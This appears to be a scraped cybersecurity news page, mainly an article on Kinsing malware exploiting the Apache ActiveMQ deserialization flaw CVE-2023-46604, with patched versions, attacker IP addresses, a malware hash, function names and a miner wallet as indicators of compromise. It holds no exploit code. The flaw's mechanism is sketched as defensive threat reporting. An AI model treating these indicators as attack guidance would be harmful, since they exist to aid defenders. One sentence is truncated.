Managed Care of North America (MCNA) Dental has published a data breach notification on its website, informing almost 9 million patients that their personal data were compromised. […]
Related Posts
GitHub warns users to enable 2FA before upcoming deadline
GitHub warns users to enable 2FA before upcoming deadline
GitHub is warning users that they will soon have limited functionality on the site if they do not enable two-factor authentication (2FA) on their accounts. […] Read More
BleepingComputer
How Businesses Can Safeguard Their Communication Channels Against Hackers
How Businesses Can Safeguard Their Communication Channels Against Hackers
[[{“value”:”Efficient communication is a cornerstone of business success. Internally, making sure your team communicates seamlessly helps you avoid friction losses, misunderstandings, delays, and overlaps. Externally, frustration-free customer communication is directly correlated to a positive customer experience and higher satisfaction.
However, business communication channels are also a major target”}]] Read More
The Hacker News | #1 Trusted Cybersecurity News Site
Apache ActiveMQ Vulnerability Exploited by Kinsing to Attack Linux Servers
Apache ActiveMQ Vulnerability Exploited by Kinsing to Attack Linux Servers
Threat actors actively targeted the Apache ActiveMQ vulnerability to get unauthorized access to messaging systems, leading to potential data breaches and system compromise.
Meanwhile, the Apache ActiveMQ vulnerability, which was tracked as “CVE-2023-46604,” can be exploited to disrupt communication, cause service outages, and deploy ransomware (HelloKitty) as well.
Cybersecurity researchers at Sekoia recently identified that the Kinsing Malware actively exploited this Apache ActiveMQ vulnerability (CVE-2023-46604) to attack the Linux server.
Apache ActiveMQ Vulnerability Exploited
This vulnerability was disclosed on October 27, 2023; it’s a severe OpenWire module vulnerability with a critical CVSS3 score of 9.8. This flaw allows unauthenticated attackers to execute code.
The flaw, rooted in deserialization validation lapses, particularly impacts ExceptionResponseMarshaller. Attackers can exploit it by creating a weaponized throwable class.
ClassPathXmlApplicationContext can be manipulated through a weaponized XML file, granting code execution. Metasploit and similar PoCs leverage this flaw.
Patches were released on October 28, 2023, urging updates to the following versions:-
5.15.16
5.16.7
5.17.6
5.18.3
If updating isn’t feasible, then make sure to block the OpenWire access from the Internet, as this will mitigate the risk.
Researchers deployed honeypots globally using ActiveMQ v5.17.5. Monitored host with Sekoia Linux agent and Suricata IDS.
Honeypots were active since 9 Nov 2023, and the first Kinsing intrusion was tracked on 11 Nov. Daily 2-3 Kinsing intrusions were recorded since 12 Nov, and the attacks were executed from the following two IP addresses:-
109.237.96[.]124
78.153.140[.]30
Kinsing infrastructure (Source – Sekoia)
Actions Performed by Kinsing Malware
Here below, we have mentioned all the actions that are performed by the Kinsing malware:-
Rootkit
Remove competitors
Download and execute
Establish persistence
Remove firewall rules
Deletes competitors
Sets up a crontab
Overview of the Kinsing Exploitation OpenWire traffic (Source – Sekoia)
Kinsing malware characteristics
Here below, we have mentioned all the characteristics of the Kinsing malware:-
SHA256 hash: 787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c
Size: 5.69 MBytes
File: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Compiler: Go1.17.13
Functions
The malware code contains over 60 functions, and below we have mentioned a few of them:-
getActiveC2Url
POST on /mu
POST on /ki
GET on /get
massscan
redisBrute
The cryptominer that is deployed is XMRig, and the UPX-packed with config details. Decompressed, it reveals a Monero wallet (46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb) and nanopool.org URL.
However, this wallet has been inactive since Nov 2019. The CTI Reports link this wallet to Kinsing, but it’s.
The numerous breaches highlight how important it is to apply security updates quickly and maintain strict control over weak points, particularly in dockerized services.
The post Apache ActiveMQ Vulnerability Exploited by Kinsing to Attack Linux Servers appeared first on Cyber Security News.
Cyber Security News